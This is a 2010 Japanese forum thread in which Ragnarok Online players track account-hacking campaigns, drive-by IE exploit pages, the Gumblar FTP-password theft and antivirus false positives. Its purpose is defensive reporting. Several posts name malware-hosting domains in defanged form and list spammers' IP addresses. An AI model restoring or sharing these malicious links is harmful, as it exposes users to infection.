PeerBlockも検討してみては <> (○口○*)さん<>sage<>10/01/22 20:27 ID:+DreDW9D0<> >>387
すいません読みたりなかったです・・・
PeerBlockを落としました
はたしてちゃんと設定できているのかどうか・・・ <> (○口○*)さん<>sage<>10/01/22 20:30 ID:RXx4BCmX0<> > 28 名前:(^ー^*)ノ〜さん[] 投稿日:10/01/22(金) 17:33 ID:1Jcuelte0
> 自動狩り、自動探索、攻撃方法指定、自動アイテム回収
> 自動帰還、多重起動、1PC起動 etc...
> http://donguapl■sitemix■jp/siteblog/

ローグスレに怪しいのが来てたので削除される前にサルベージだけ <> (○口○*)さん<>sage<>10/01/22 21:25 ID:9/9sLCwC0<> 検索すると4時間前にばらまき開始のようだな <> (○口○*)さん<><>10/01/22 22:15 ID:RXx4BCmX0<> >>389と同様のアドレスの投稿がありました。
sitemixには通報済み。
尚、投稿者のIPは
119.30.132.28 (BBQで焼かれ済み)
122.210.107.66 (122x210x107x66.ap122.ftth.ucom.ne.jp)
意外な事におでんではないようです。

お掃除にはRO関連Wiki用アンテナ
http://smith.z49.org/antena/
とか便利です。奴らは同時にばばばーっと改竄していくのでめぼし付けやすいです。
更新チェックというよりは改竄された場合のお掃除が楽なようにって意図で設置
したのですけどね。 <> (○口○*)さん<>sage<>10/01/22 22:36 ID:QJl88rb00<> >>389
久しぶりにHTML見てみたけど
CVE-2010-0249ってIEの例の奴かな <> (○口○*)さん<>sage<>10/01/22 22:37 ID:9/9sLCwC0<> 今日パッチが出たから、それを解析したんだろうな <> (○口○*)さん<>sage<>10/01/23 01:19 ID:gWNABz0q0<> とりあえずセキュ板提出しといた <> (○口○*)さん<>sage<>10/01/23 12:51 ID:enNS129T0<> ガンホーの対応の問題ではないんだが、
ワンタイムパスワードのau対応機種が古すぎる。
ほとんど2年前の機種で店頭で見かけないくらいの古さ。
携帯の代替サイクルは結構早いから使える人かなり限られるんじゃないか。
普通は最近2年くらいの機種を対応にして古いのは切り捨てるものなんだが。 <> (○口○*)さん<>sage<>10/01/23 12:59 ID:fO+OVZsi0<> >>389
iframe で www■snsatfb■com/1/ie.html
ttp://www.virustotal.com/analisis/f250c0e0f3b16b20a795c20aee0b182d8b12d94fb100b295d1095cc9fc7300e9-1264218736
MS10-002 <> (○口○*)さん<>sage<>10/01/23 14:10 ID:aiTiiaxJ0<> 別の会社の製品だけどさ、対応機種はこれぐらいあるとうれしいね……
ttp://www.bizemotion.net/joomla/index.php?option=com_content&view=article&id=57&Itemid=61 <> (○口○*)さん<>sage<>10/01/23 14:36 ID:vIwJ9/ok0<> >>395
今のところ、KCP+機種は全滅ぽいね。
旧KCP機種でも、E02SA/E03CAみたいな法人機種が含まれているあたりはリソース流用と思われるふしがあるけど。
ただ、800MHz帯再編で2年半後には使えなくなる機種への対応よりも、KCP+機種への対応を急ぐべきだとは思うな。 <> (○口○*)さん<>sage<>10/01/23 16:04 ID:xEFcV70N0<> >>389
言わずもがな福建一味のドメイン。
一応リネージュ資料室のhostsには含まれている。
資料室hostsを使っているならばアクセスできないためsitemixに感染スクリプトがおかれていない限りは影響は無いかな?
それにしてもsitemixはまた使われたか、そろそろ対策しないと愛用された挙句に自らやられそうな気がしないでもない。

今回のは殆どROばっかりヒットするから回転寿司よろしくまた戻ってきたのかもね。
そろそろ忘れた、垢ハックの件を知らない人間がプレイし始めたであろうとばかりに。
油断も隙もあったもんじゃない。

気をつけてくれよな! <> (○口○*)さん<>sage<>10/01/24 00:42 ID:SVAoW/Js0<> >>398
だが2年前に1円ケータイだった俺の機種に隙はなかった
そもそもWINじゃなくて第2世代ってくらいだからなwww

とりあえず既存を流用して人口の多そうなところをカバーしつつ
順番に新しい方へ追加対応するつもりならスタートとしては間違ってない
最初に新しいのをサポートしちゃうと、古いの増える見込み無いしな・・・ <> (○口○*)さん<>sage<>10/01/24 00:49 ID:t5TW6mOU0<> まあ、仕様をコロコロ変える携帯メーカーも悪いと思う。 <> (○口○*)さん<>sage<>10/01/24 02:07 ID:gQn6NDDH0<> ただ、ガラケー大好きの日本人向けに新機能を盛り込めるOSを作らないと、MNP転出が増える一方だからねえ。
只でさえ、スマートフォンでは海外OSの独壇場みたいになっているし。
それと一応、800MHz帯再編は国策によるものなので、キャリアだけを責めることはできないが。 <> (○口○*)さん<>sage<>10/01/24 21:38 ID:b0C+Vicz0<> オンラインゲームをかたるフィッシング出現、ファンサイトから誘導
ttp://itpro.nikkeibp.co.jp/article/NEWS/20100122/343647/

今のところは、ファンタシースターユニバースだけの様だ <> (○口○*)さん<>sage<>10/01/24 22:07 ID:I4d7cYEB0<> FFはすでに存在するけど英語サイトだったかな <> (○口○*)さん<>sage<>10/01/25 05:46 ID:5JOj7iGI0<> セキュリティ情報 - iモードIDを用いた「かんたんログイン」のDNS Rebinding脆弱性
ttp://www.hash-c.co.jp/info/20091124.html

直接は関係ないけどメモ程度に <> (○口○*)さん<>sage<>10/01/25 06:04 ID:HcrODrSH0<> >>403
ログイン認証にCAPTCHAを使っている公式サイトのアホさは何とかならんのか…… <> (○口○*)さん<>sage<>10/01/25 11:35 ID:Rs6dIAV10<> http://pc11.2ch.net/test/read.cgi/hosting/1260717684/654
xreaのs294トップが書き換えられている模様(確認時点でウイルスは無し) <> (○口○*)さん<>sage<>10/01/25 11:43 ID:WrMMtKEq0<> また、xreaか <> (○口○*)さん<>sage<>10/01/25 20:51 ID:grZBIX6c0<> 教えてgooにカスペルスキーが反応

Trojan.JS.Redirector.ar

誤爆っぽいけど一応。 <> (○口○*)さん<>sage<>10/01/25 21:03 ID:xkaryXQn0<> >>409
KasperskyでWebサイト閲覧時にトロイの木馬が誤検知される件
ttp://www.just-kaspersky.jp/support/info/20100125.html?m=jui25k01

これだな <> (○口○*)さん<>sage<>10/01/25 21:08 ID:deJuFTnz0<> モスクワからお返事来てた
Sorry, it was a false detection. It will be fixed in the next update.
Thank you for your help. <> 409<>sage<>10/01/25 21:09 ID:grZBIX6c0<> 失礼しました、カスペ公式にて既出だった模様。

>>410
ご指摘有難うございます。 <> (○口○*)さん<>sage<>10/01/26 00:52 ID:r+LPIpD10<> アンチウィルスソフトの相談はここでも大丈夫でしょうか?

あと2日でいま使っているカスペルスキー2009の期限が切れてしまいます。
別のPC用に2ヶ月ほど前に2010を買って、
そちらは2台まで使用可能なのでこのPCにも使えるのですが、
最初に2010を入れたほうのPCは、
バージョンアップされた2010を入れなおしても、
ROのクライアントの起動を数回繰り返すといろんなアプリの起動やOSの終了ができなくなってしまいます。

このPCでも同じ症状が出ると困るのですが、
お勧めのセキュリティソフトか、
この症状を回避する方法がありましたらご教示お願いいたします。 <> (○口○*)さん<>sage<>10/01/26 01:28 ID:rDuJIJcf0<> はっきりしたトラブルが出ていて、かつROクラが関係しているなら
エラースレで聞いた方がいいかもしれない

とりあえず応急措置を兼ねてフリーのAviraをお勧めしておく <> (○口○*)さん<>sage<>10/01/26 02:48 ID:8yPTYb7s0<> >>413
それはGameMon.des害座ってるんじゃないの <> (○口○*)さん<>sage<>10/01/26 08:47 ID:iWF5HbZg0<> スラドの記事を開くとカスペ先生がでTrojanを検出する
広告っぽいんだけれど詳細不明 <> (○口○*)さん<>sage<>10/01/26 08:50 ID:YD1KWjjT0<> >>416
>>410 <> (○口○*)さん<>sage<>10/01/26 20:03 ID:waH54Ho30<> 年明け国内フィッシング事情(2)〜ゲームアカウント狙うフィッシング2題
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2133 <> (○口○*)さん<>sage<>10/01/27 10:38 ID:xKg/OJiB0<> 福建中華が掲示板などであまり暴れなくなったと思ったら
個人のプロフィールなどを改竄して暴れているようだ。

389のやつでIFRAMEに仕込まれてたsnsatfbを検索すると
個人のアメーバプロフィールが改竄され、リンクを差し替えられていた。
今は修正済みなので下をGoogle検索して、キャッシュから確認可能。
profile■ameba■jp/stunt-life/

もはや個人プロフ改竄までするとは無差別ですなぁ。
残存ドメイン群で最後の一稼ぎといったところ?

こわいこわい。
気をつけてくれよな! <> (○口○*)さん<>sage<>10/01/28 03:11 ID:mrvNMa050<> 『4gameranking .com』に修正ホヤホヤなIE脆弱性攻撃コード
ttp://blogs.yahoo.co.jp/noooo_spam/59454037.html

攻撃コードも変わってるみたいだね <> (○口○*)さん<>sage<>10/01/28 06:54 ID:JZzjikqP0<> xia.exeも新しくなってたしね。バイナリをチラ見した限りでは
PCClient系バックドアだと思う(前はダウンローダだった)。 <> (○口○*)さん<>sage<>10/01/28 12:17 ID:BiG6n9rV0<> kagoyaとxrea改竄の件が出てた
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2135 <> (○口○*)さん<>sage<>10/01/28 23:42 ID:+KvPcITB0<> カスペルスキー2010が
ROがPDM keyloggerに感染している可能性ありと出すのですが
これってどうなんですか? <> (○口○*)さん<>sage<>10/01/28 23:58 ID:2Cf6CC2K0<> 直接垢ハックには(今のところは)関係していないけど

RealNetworks, Inc.、セキュリティ脆弱性に対応するアップデートをリリース
ttp://service.real.com/realplayer/security/01192010_player/ja/

Google Chrome: Stable Channel Update
ttp://googlechromereleases.blogspot.com/2010/01/stable-channel-update_25.html <> (○口○*)さん<>sage<>10/01/29 00:26 ID:q0vYQHSoO<> >>424
そうなんですか
キーロガーだとどうしても不安になってしまいます
ご丁寧にありがとうございます <> (○口○*)さん<>sage<>10/01/29 06:42 ID:MndOuda90<> な なんだってー!! <> (○口○*)さん<>sage<>10/01/29 07:39 ID:y89B5Erg0<> 誰もツッコミ入れて無いから気がついて無いっぽいけど、
>>424>>423の質問内容の答えじゃ無いと思う <> (○口○*)さん<>sage<>10/01/29 07:45 ID:kZ8z87Wn0<> というか>>425は何をどう理解したのだろうか <> (○口○*)さん<>sage<>10/01/29 07:51 ID:1ybWsHKK0<> 『1行目しか理解できないけど、「直接垢ハックには(今のところは)関係していない」って言ってるから大丈夫だよね!』 <> (○口○*)さん<>sage<>10/01/29 10:37 ID:q0vYQHSoO<> >>423,425の書き込んだものです

>>424は自分宛ではないのですね・・・
突っ込みありがとうございました <> (○口○*)さん<>sage<>10/01/31 15:52 ID:O1w0nLd70<> 「携帯アプリ型ワンタイムパスワード」ベータテスト開始![更新][2010/01/28][2010年1月29日 掲載]
http://www.ragnarokonline.jp/news/information/notice/item/13370
ラグナロクオンライン運営チームです。

ソフトバンクモバイルの携帯電話をお持ちのユーザーの皆様、大変お待たせいたしました!
NTTドコモ、auの携帯電話で先行して実施しております「携帯アプリ型ワンタイムパスワードサービス」
が、いよいよ2010年2月1日(月)11:00より、ソフトバンクモバイルの携帯電話でもご利用いただける
ようになります!


>>395
なんか増えたらしい
http://www.ragnarokonline.jp/news/information/notice/item/13370
[2010年1月28日 掲載]

auの携帯電話をお持ちのユーザーの皆様へお知らせです。

本日2010年1月28日(木)11:00より
「携帯アプリ型ワンタイムパスワードサービス」が
より多くのauの携帯電話でご利用いただけるようになりました。 <> (○口○*)さん<>sage<>10/01/31 17:53 ID:Gy1yChQX0<> 昨今のWeb改組の真相はこういうロジックだったのか

【FFFTP】 FTP接続時のパスワードが抜き取られサイトの改竄相次ぐ 【Gumblarウイルス】
ttp://tsushima.2ch.net/test/read.cgi/news/1264841726/154

--
・FFFTP
  パスワードを暗号化して保存するが、解析される。
  FTP通信しなくてもアウト。

・FileZilla
  パスワードを平文で保存。
  FTP通信しなくてもアウト。

・その他のFTPクライアント
  保存されたパスワードは盗まれないかもしれない。
  ただし、FTP通信をした時点でパケットからパス抜かれてアウト。

・FTPS
  パケットは暗号化される。現時点のGubmlar等には有効。
  ただし、設定ファイルの詐取やキーロガー等を併用されたら危ない。

・SFTP
  パケットは暗号化される。現時点のGubmlar等には有効。
  ただし、設定ファイルの詐取やキーロガー等を併用されたら危ない。
  鍵による認証を行えばかなり安全。
  SSHがベースのため、ディレクトリを上位までたどれてしまったり、
  TCP22番へのSSH総当たり攻撃に晒される危険あり。
--

FTP の危険性に関して超簡単まとめ | WWW WATCH
http://hyper-text.org/archives/2010/01/ftp_security.shtml

Sota's Web Page (GumblarによるFFFTPへの攻撃について)
http://www2.biglobe.ne.jp/~sota/ffftp-vulnerability.html

窓の杜 - 【NEWS】「FFFTP」のパスワードが“Gumblar”ウイルスにより抜き取られる問題が発生
http://www.forest.impress.co.jp/docs/news/20100130_346056...

-- <> (○口○*)さん<>sage<>10/01/31 18:07 ID:Gy1yChQX0<> 間違えちゃいけないのは、FFFTPソフトの脆弱性ではないことだ
FTPというプロトコル自体の問題と、設定をPCに保存するという概念を悪用したものだから
ソフトを変えたりパッチを当てたりすることで(根本的に)解決する問題ではない

>SFTP に対応したクライアントとしては WinSCP、
>FTPS 対応クライアントとしては NextFTP (シェアウェア) が
>それぞれ個人的なオススメです。
記事中でオススメされているソフトを入れたから安全というわけでもない。
昔から使ってるけどバージョン古ければ対応してないだろうし
サーバー側の対応状況というのも当然ある、クライアントだけじゃダメ
「FTPを極力使わない」と言うのはいちおうは正しいけど
はたしてBlogなら安全かと言えばスレの過去ログ見てればよく分かることでw

お前らも気をつけてくれよな!(これが言いたかった <> (○口○*)さん<>sage<>10/02/01 04:30 ID:E1nDdkWL0<> 3つ目のリンク先が正しく貼れていないようなのでフォロー。
ttp://www.forest.impress.co.jp/docs/news/20100130_346056.html

FFFTPの問題はOSSには付き物だし、パスワードのローカル保存自体にどうしても一定のリスクはある。
それに、FTPにしか対応していないのは時代遅れだという認識を、もっと多くのレンタルサーバ業者が持つべき時期に来ている。 <> (○口○*)さん<>sage<>10/02/01 11:53 ID:xDYI03+w0<> せめてAPOPみたいなものがあればねー

パスワード管理はローカルに保存する以上は何らかのリスクがある
携帯アプリなんかだと運用次第ではある程度の安全が確保できそうだが <> (○口○*)さん<>sage<>10/02/01 12:30 ID:kNdYkuT60<> 携帯アプリだと、環境が限られてるのをいいことに手抜きしてたりして
かえって危なかったりする、なんて話を聞いたことあるな <> (○口○*)さん<>sage<>10/02/01 20:06 ID:HQRSjzn30<> 世間ではFFFTPだけが危ないという空気が流れてしまって問題になっとるな
オンラインゲームでハク被害があるように、ピンポイントで狙われたら何だって
危ないんだがなあ <> (○口○*)さん<>sage<>10/02/02 11:39 ID:02RyPpQZ0<> 有名どころの企業も結構やられてて、全ての企業がフリーソフトで
サバ管理してたとは思えない。
FFFTPがスケープゴートにされてる気がするな。 <> (○口○*)さん<>sage<>10/02/02 11:56 ID:D5Sd9FgH0<> >>438
標準PC(笑)はLAN管が用意してたんだけど、ライセンスの都合で業務に必要な
フリーソフトがたくさんインストールされてた。
その中にfftpもあった。(他はterapad、teraterm、bz、DF、IPメッセンジャー[後に使用禁止]、ネスケ6、eclipseとか)
逆にライセンス料払ってるソフトはTSOとMSOffice、ウィルスバスター、QNDくらいだったよ。。。


>FFFTPがスケープゴートにされてる気がするな。
自鯖のftpサービスに使ってるFilezilaサーバみたらPassが平文でXMLに保存されてて吹いたwww
ギルド用に自鯖立ててる人はこの機会に見てみるのもいいかもねー <> (○口○*)さん<>sage<>10/02/02 18:14 ID:IMAjiT+90<> Filezilaは絶対にパスワードを保存しないでと注意があったはず


そもそもキーロガー仕掛けられたことが問題なんだけどな
キーロガーが居たらどんなソフト使おうが同じだし <> (○口○*)さん<>sage<>10/02/02 19:11 ID:C9CtVWPg0<> >>439
試しに自分のFilezillaServerのXmlを覗いてみた。
Passは16進数32桁のように見えたが平文って? <> (○口○*)さん<>sage<>10/02/02 19:46 ID:D5Sd9FgH0<> >>441
FileZilla Server Interface.xml
にLastServerPasswordってあるんだが、これ全然関係ないんかな? <> (○口○*)さん<>sage<>10/02/02 20:43 ID:C9CtVWPg0<> それはローカルからログインするサーバ管理用のパスワードでは。
自分は設定していないので空欄だったから平文かどうかわからなかった。
外部から繋ぐユーザーアカウントはFileZilla Server.xmlにずらずら載ってる。
暗号化されてね。

てか > 関係ないんかな? って自分で決めたパスワードなら分かるだろ。
一体誰のサーバを覗き見してるんだよ。 <> (○口○*)さん<>sage<>10/02/02 21:13 ID:MaiNcTum0<> 何と戦ってるんだ <> (○口○*)さん<>sage<>10/02/03 00:36 ID:4OLLfcs50<> >>438
勘違いした人が広めてしまっただけでスケープゴートでもなんでもないよ <> (○口○*)さん<>sage<>10/02/03 17:20 ID:9KsoO8BK0<> FTP アカウント情報を盗むマルウエアに関する注意喚起
http://www.jpcert.or.jp/at/2010/at100005.txt

FFFTP以外にも14のFTPクライアントが標的になっていたようだ
これで誤解が減るといいね。 <> (○口○*)さん<>sage<>10/02/03 17:48 ID:T2SQeAX30<> 標的というか、JPCERT/CCで
「マルウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を確認」
したものですな
つまりウイルス作成側が最初からこれらを標的にしていたのではなく、
クライアントが攻撃対象になりうる弱点を抱えていたと

- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07
- WinSCP 4.2.5
Web ブラウザのアカウント管理機能で保存
- Microsoft社 Internet Explorer 6
- Opera社 Opera 10.10

当然、確認されていないFTPクライアントもある
リストにないから安心、ではないので注意
>また、今後攻撃の対象となるソフトウエアが増えたり、使用される脆弱性が変化したりする可能性があるため、
>ユーザは利用しているソフトウエアを最新版に更新することを心がけてください。
当然クライアントソフト作成側でも注意はしているはずなので、
そのリアクションをきちんと見ることが必要 <> (○口○*)さん<>sage<>10/02/03 18:15 ID:5iPhcQ7u0<> ftp通信をピンポイントで探られたらアチャーだし <> (○口○*)さん<>sage<>10/02/03 18:33 ID:RIvLtT+K0<> というか、今まではパケットスニファしてたわけじゃなかったのか
ftpは平文でパスワードが流れるからパケット読んでるもんだと思っていたが
そのうちパケットスニファするタイプも出てくるのかもしれんが(もうでてるかも?) <> (○口○*)さん<>sage<>10/02/03 18:36 ID:4jMcHl610<> >>449
>>432でも読み返してこい <> (○口○*)さん<>sage<>10/02/03 19:46 ID:RIvLtT+K0<> >>450
おお、すまない。右から左へと流れてたようだ
理解した

telnetが使われなくなったようにftpも使われなくなっていくのかねぇ <> (○口○*)さん<>sage<>10/02/03 21:09 ID:Ff3eptBS0<> もともとインターネット関連技術は盗聴されたり改変されることは考慮されていないからなー <> (○口○*)さん<>sage<>10/02/03 23:33 ID:zifvIQwJ0<> telnetがsshに置き換わったように、ftpもscpやsftpに置き換わるのかな

ftpは送信しているパケットを解析されたら終わりだから
WinPcapが入っていると危険な気もするな <> (○口○*)さん<>sage<>10/02/03 23:38 ID:9T47/pA00<> WinPcapなんてなくてもrawソケットで充分。
カーネルモードドライバを自前で仕込んだっていいし。
どっちも特権が必要だけど。 <> (○口○*)さん<>sage<>10/02/04 01:19 ID:AyMiUuS70<> >>453
むしろ、今まで置き換わらなかったのが遅すぎるくらい。
現実に悪用されるまでに至るケースの少ないWEPの危険性なんかよりも、こちらの危険性のほうが率先して啓蒙されるべきだったくらい。
それと、各種法人もISPも安易にフリーソフトに頼り過ぎなのもある。
FFFTPが槍玉に挙げられたのも、そういった側面があったからなのだし。
これが有償のソフトやソリューションなら、導入準備段階で評価や比較選定といったフェーズを経て機能面でも煮詰めが行われる訳だから。 <> (○口○*)さん<>sage<>10/02/04 01:28 ID:F5nheC3n0<> だから、キーロガー仕掛けられたら、メーカー製だろうか何だろうが同じだから <> (○口○*)さん<>sage<>10/02/04 01:31 ID:+ODkusZ70<> 企業に関してはサーバ側の設定とかもまずいよね
まともなセキュリティ意識あるところならftpは使わないとか,使うにしても内部ネットワーク
からのみの接続に限るとか,サーバが外部ならば接続できるIPアドレスを限定するとか
できることはあるのにね。
# IPアドレスは偽装できるっちゃ偽装できるけど <> (○口○*)さん<>sage<>10/02/04 03:38 ID:AyMiUuS70<> >>456
論点というか着眼点がずれすぎ。
このところのケースは、レジストリやiniファイルに保存されていたパスワードが標的にされた事で、更新頻度の低い、
あるいは更新を行っていないサーバや引越し前のサイトなども改竄対象となったのが被害拡大の一因でもある。
日常的に更新を行っている(≒キーロガーの標的になる)サイトと違って、サイト管理者自身が気付きにくいのだし。 <> (○口○*)さん<>sage<>10/02/04 13:17 ID:72fUrsTi0<> ずれるというより、元となったウィルスの話をしている人と
派生したFTPとその周辺の話をしている人がごっちゃになってるだけだろうよ

フリーウェアどうこうより、サーバの運用に対して安易なんだと思うな
FTP+FFFTPでも、トンネリングを必要とさせる等そう簡単には破られない運用方法はある

運用を片手間にやってる・専属の管理者がいてもレベルが低い・高くても立場が弱すぎる
そういうサーバは脆い、たとえどんなにきっちり構築しても骨抜きになるだけだ

ISPが「ホームページ」サービスのことなら・・・まあ仕方がないんじゃない?
あれそのものが前時代の名残みたいなもんだし <> (○口○*)さん<>sage<>10/02/05 10:29 ID:dn4TSz4f0<> 月例は10日で、旧バージョンのOffice向けパッチも含まれる。
ttp://www.itmedia.co.jp/news/articles/1002/05/news019.html <> (○口○*)さん<>age<>10/02/06 21:25 ID:OjBDo4th0<> 未だに狩場情報ひっそりにトロイあるらしいな <> (○口○*)さん<>sage<>10/02/06 21:31 ID:/lf25RcU0<> 古いバージョンのサポート終了アナウンス

Windows 2000のサポートは2010.07.13で終了

Windows XP SP2のサポートは2010.07.13で終了 → SP3にするかWindows 7への移行が必要 <> (○口○*)さん<>sage<>10/02/06 22:45 ID:P3C2j/hQ0<> >>461
閉鎖してなかったか? <> (○口○*)さん<>sage<>10/02/06 22:46 ID:DxCsKBn90<> >>461
狩場情報ひっそりってこのサイトのこと
tp://huntinfo●xrea●jp/

アクセスしてもUnder Constructionとしか表示されないけど本当にトロイがあるの?
それともどこか別のサイトの事? <> (○口○*)さん<>sage<>10/02/06 22:54 ID:ZKBaC9S80<> ソースみたけど、その1行だけだったな <> (○口○*)さん<>sage<>10/02/06 22:55 ID:nIhajSCu0<> 垢閉鎖はしないんだな。
ってよく考えたら取られたら大変だしな。 <> (○口○*)さん<>sage<>10/02/06 22:55 ID:/lf25RcU0<> xreaサーバーのIPアドレスが垢ハックありとして登録されているんだろう <> (○口○*)さん<><>10/02/07 13:14 ID:a10ZBvST0<> 【社会】「Firefox」のアドオン2つからトロイの木馬を検出…導入するとマルウェアに感染する恐れ
ttp://tsushima.2ch.net/test/read.cgi/newsplus/1265499507/ <> (○口○*)さん<>sage<>10/02/07 13:38 ID:IGhVDJBD0<> 上のスレだとノイズが多すぎるのでセキュリティーmemoから転載

--

Firefox 用のアドオン、Sothink Web Video Downloader 4.0、および Master Filer の全バージョンに、トロイの木馬が発見された話。

・Sothink Web Video Downloader 4.0: Win32.LdPinch.gen
・Master Filer: in32.Bifrose.32.Bifrose

上記アドオンは addons.mozilla.org (AMO) から削除された。なお、Sothink Web Video Downloader 4.0以前にはこの欠陥はない。 <> (○口○*)さん<>sage<>10/02/07 18:21 ID:865GlbIR0<> >>468,469に関連して。
Sothink自体が、元々素性がアレだったという話。

FlashGotとSothink: ライセンス違反の一事例
ttp://sourceforge.jp/magazine/09/06/29/015200 <> (○口○*)さん<>sage<>10/02/07 23:41 ID:6TYucL570<> 野放しにされているところから狙ってきてるな <> (○口○*)さん<>sage<>10/02/09 23:57 ID:azresQZW0<> レス抽出しても見当たらなかったから書き込ませてもらうが、
Kingsoftというところが無料でセキュリティソフトを使えるんだがこれ誰か使っているのかな
使っていたら使用感をおしえてほしい。

有料と無料の違いは広告があるなしだけらしい <> (○口○*)さん<>sage<>10/02/10 00:21 ID:DMRIBdmT0<> >>472
本体が中華って時点で使ってみる気にならない <> (○口○*)さん<>sage<>10/02/10 00:27 ID:yyk38XEf0<> そもそも自分で調べられない人には無料のセキュリティ対策ソフトは不向き
サポートが受けられるように有料製品をお買い求めください <> (○口○*)さん<>sage<>10/02/10 00:36 ID:0LQjMqLZ0<> 正論だな
ただおすすめは分からんよね
どのソフトはどんな不具合がある、だとか知りたい人は多そうだ <> (○口○*)さん<>sage<>10/02/10 00:56 ID:7XhD46Kk0<> 43 :(○口○*)さん sage : 2007/08/29(水) 19:03 ID:lAiBppsY0
::::::::/           ヽ、   :: ::: ::: :::::::::::::::::::::::::::::::::
:::::/            lハ ::: : :: :::::::::: :::::::::::::::: ピンポ〜ン♪
::::l           l  /ノリ ::: : :: ::::::::::: ::::::::::::::::::::::::::
:::|          /) / ::: : :: ::::::::: ::::::::::::::::::::::: 宅配です
::l          /イ/| . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
/          / ||/ / ̄ ̄ ̄ ̄ ̄7l::::::::::::::::::::
      i   /_,/i!/         / l::::::::::::::::
      l    人  /  KIS     ./ /::::::::::::::::
     l   / /⌒ヽ  ver.7    / /::::::::::::::::
     l  /il  |   )       / /::::::::::::::::
     ll l i! `ー、\___ /.n/::::::::::::::::
     lヽ l    |\. \   /⌒〉::::::::::::::::

           〃´⌒ヽ
     ., -――  メ/_´⌒ヽ
   /   / ̄  ´ヽ ヽ
  ./  ,  /// ト. !  、 丶ヽ
  l  / /(((リ从  リノ)) '
  |  i  l  ●  ヽノ ●V l    ねんがんの
  l ,=!  l ⊂⊃、_,、_, ⊂⊃l    Kaspersky Internet Security
  l ヾ! ', l    (__,ノ   l l     が届いた!!
  |  ヽヽヽ        //
  l    ヾ≧ , __ , イ〃
  li   (´`)l {ニ0ニ}、 |_"___
  li   /l, l└ タl」/|. Kingsoft ..|
  リヽ/ l l__ ./  |_________|
   ,/  L__[]っ /      / <> (○口○*)さん<><>10/02/10 09:26 ID:YAxck8T90<> 月例age
計13件 (緊急 5件, 重要 6件, 警告 1件)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-feb.mspx
ttp://blogs.technet.com/jpsecurity/archive/2010/02/10/3311690.aspx <> (○口○*)さん<>sage<>10/02/10 16:56 ID:ACPyIdW+0<> AdobeはM$以上に怠慢になりつつあるな
ttp://www.itmedia.co.jp/news/articles/1002/09/news020.html <> (○口○*)さん<>sage<>10/02/12 19:12 ID:UX8Aq5Go0<> Flash Player更新
ver9もまだアップデートやってくれるんだな <> (○口○*)さん<><>10/02/13 21:35 ID:AzzZbp8aO<> 友人が古いパッケージのDISC使ってROをインストールしてたらトロイ反応が出たって電話してきたけど、そんな事ってあるか?
検知されたのはROのexe
ソフトはカスペ、最近誤検知あったしこれもその類いかな?
一応ググったけどイマイチはっきりしない

ウィルス名で見当つく人います?
Trojan.Win32.Buzus.czyi <> (○口○*)さん<>sage<>10/02/13 21:49 ID:QThiq6/c0<> 昔はゲーム上のログイン画面でIDパス入力してたが今はウェブ経由でragexe.exeに渡してるからな
それが誤検知されてるケースはよくある <> (○口○*)さん<>sage<>10/02/13 22:03 ID:11p1fAfb0<> >インストールしてたらトロイ反応が出た
インストール中のファイルコピー時でいいんだよな?初回起動を含めたセットアップ全体を指してはいないよな?

nProは限りなくウィルスに近い存在だから誤検出は当たり前
インストールCDが汚染されていたなら騒動になってるから、(正規品からの)インストール中ならまず問題はない

ただそれとは別に、いつのパッケか知らんけどパッチ溜まっていそうだしクラDLしなおしたほうがいいと思う <> (○口○*)さん<>sage<>10/02/13 22:08 ID:PIoU2+J10<> >>480
スパイウェアとしての扱いだね。さもありなん。

TR/Spy.Buzus.gyj
ttp://www.avira.com/jp/threats/section/fulldetails/id_vir/4173/tr_spy.buzus.gyj.html
別名
McAfee(マカフィー) Spy-Agent.bw trojan
Kaspersky(カスペルスキー) Trojan.Win32.Buzus.gyj
F-Secure(エフ・セキュア) Trojan.Win32.Buzus.gyj
Eset Win32/Wigon.BC trojan
ビットディフェンダー(Bitdefender): Trojan.Spy.WSNPoem.CN

あんまりにも古いファイルは特定のパッチに失敗するので、新しいクライアント落としなおして入れるように
伝えたほうがいいよ。 <> (○口○*)さん<>sage<>10/02/13 23:45 ID:eHiptTWy0<> 2009/12/18発売のアニバーサリーパッケージですら
入っているのは古いクライアント(2009/02版?)で、パッチ当てに失敗するから
おとなしく公式から最新のクライアントをダウンロードしてください <> (○口○*)さん<>sage<>10/02/14 00:15 ID:pgbgxiW50<> Vista対応時期以前のインストーラやパッケージだと、デフォルトのフォルダがProgram Files配下になっていて
今後も無用のトラブルを招く要因になり得るから、公式サイトから最新のインストールファイルを入手して
外部メディアなり何らかの媒体に保存しておいた方がいいと思うよ。 <> (○口○*)さん<>sage<>10/02/14 02:16 ID:EgNATeDC0<> パッケージの購入層が既存プレイヤーだからって適当すぎじゃ <> (○口○*)さん<>sage<>10/02/14 12:48 ID:NJ9KyKle0<> >Program Files配下になっていて
それをわざわざ避けるんだからイレギュラな存在だよ。
韓国のクライアントは今も普通にProgram Files下だから。 <> (○口○*)さん<>sage<>10/02/14 14:59 ID:Vr1fdprE0<> http://aimeblog■com/watch/sm3683942/
を踏んでしまった・・・ <> (○口○*)さん<>sage<>10/02/14 15:09 ID:m6C1xtw70<> 自分で調べろよカス <> (○口○*)さん<>sage<>10/02/14 15:46 ID:q/e1YAbd0<> 変わりに俺がやってやろう

gredでの診断はsafe。

しかし、aguse.jpでの診断結果はアウト。マルウエアが検出された
Trojan-Downloader.JS.Iframe.apk <> (○口○*)さん<>sage<>10/02/14 18:01 ID:lRnyIRH10<> >>488
アウト。OS再インストールコースいってらっしゃ〜い。 <> (○口○*)さん<>sage<>10/02/14 18:07 ID:AHn8v/A/0<> そもそもaimeblogは真っ黒な中華ドメインでございます <> (○口○*)さん<>sage<>10/02/14 19:02 ID:BReuaXbnO<> 報告遅れましたが480です。
とりあえず友人には問題ないからネット繋いで公式から最新のクラ落としとくように言っときました
書いた後に思い出したけど、昔市販のPCソフトでも同じようになったっけ…
